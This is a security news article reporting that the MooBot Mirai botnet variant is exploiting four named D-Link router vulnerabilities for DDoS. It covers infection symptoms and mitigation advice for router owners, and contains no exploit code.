A new assault wave that began early last month has seen the re-emergence of the MooBot Mirai malware botnet variant, which targets unprotected D-Link routers using a combination of existing and new flaws. MooBot was found by experts at Fortinet in December 2021 to propagate rapidly and gather a sizable number of devices for its DDoS (distributed denial of service) army.
The malware has now updated its targeting scope, which is customary for botnets searching for untapped reserves of susceptible devices they may capture. According to a study published by Unit 42 researchers at Palo Alto Networks, the following significant D-Link device vulnerabilities are being targeted by MooBot right now:
- CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
- CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
- CVE-2022-26258: D-Link Remote Command Execution Vulnerability
- CVE-2022-28958: D-Link Remote Command Execution Vulnerability
The vendor has published security upgrades to fix these issues, but not all users have installed them yet, mainly the most recent two, which were made public in March and May this year. MooBot’s operators use the holes’ minimal attack complexity to acquire remote code execution on the targets and fetch the malware binary using arbitrary instructions.
When the malware decodes the configuration’s hardcoded address, the freshly acquired routers are registered on the threat actor’s C2. The C2 addresses provided in Unit 42’s report differ from those in Fortinet’s write-up, which is significant since it suggests that the threat actor’s infrastructure has been updated. Depending on the objectives of MooBot’s operators, the seized routers eventually participate in targeted DDoS assaults against different targets.
The firepower of the botnet is rented to anybody interested in disrupting websites and online services since threat actors typically offer DDoS services to others. Internet speed decreases, unresponsiveness, excessive router heat, and mysterious DNS configuration changes are all symptoms of botnet infections that users of hacked D-Link routers may experience.
The easiest way to keep MooBot out is to upgrade your D-Link router’s firmware when it becomes available. You should set up any outdated or unsupported hardware you use to restrict remote access to the admin panel. If you think you may have already been hacked, you should reset the device using the associated physical button. After that, change your admin password and apply the most recent vendor security updates.
